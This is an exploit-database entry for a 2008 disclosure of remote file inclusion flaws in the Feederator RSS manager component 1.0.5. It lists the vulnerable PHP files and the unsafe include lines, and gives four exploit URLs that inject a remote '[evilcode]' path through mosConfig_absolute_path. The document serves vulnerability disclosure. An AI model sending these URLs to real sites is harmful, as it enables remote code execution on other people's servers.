header-logo
Suggest Exploit
vendor:
Feederator
by:
NoGe
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Feederator
Affected Version From: 1.0.5
Affected Version To: 1.0.5
Patch Exists: NO
Related CWE: N/A
CPE: a:recly:feederator:1.0.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Feederator – RSS manager Component 1.0.5 Multiple Remote File Inclusion Vulnerabilities

Feederator - RSS manager Component 1.0.5 is vulnerable to multiple Remote File Inclusion vulnerabilities. The vulnerable files are add_tmsp.php, edit_tmsp.php, subscription.php and tmsp.php. An attacker can exploit these vulnerabilities by sending a malicious URL to the vulnerable application. The malicious URL contains the malicious code which will be executed on the vulnerable application.

Mitigation:

The application should validate the user input and filter out any malicious code. The application should also restrict the access to the vulnerable files.
Source

Exploit-DB raw data:

===================================================================================================================================================


  [o] Feederator - RSS manager Component 1.0.5 Multiple Remote File Inclusion Vulnerabilities

       Software : com_feederator version 1.0.5
       Vendor   : http://www.recly.com/
       Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=2
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


===================================================================================================================================================


  [o] Vulnerable file

       administrator/components/com_feederator/includes/tmsp/add_tmsp.php

        require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' );

       administrator/components/com_feederator/includes/tmsp/edit_tmsp.php

        require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' );

       administrator/components/com_feederator/includes/tmsp/subscription.php

        require_once($GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/GlobalVariables.class.php');

       administrator/components/com_feederator/includes/tmsp/tmsp.php

        require_once( $mosConfig_absolute_path . '/components/Recly/Recly_HTML/Recly_Paginator.class.php' );



  [o] Exploit

       http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=[evilcode]
       http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=[evilcode]
       http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
       http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=[evilcode]


===================================================================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/blog/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11  martfella
       skulmatic olibekas ulga Cungkee k1tk4t str0ke

        
===================================================================================================================================================

# milw0rm.com [2008-11-07]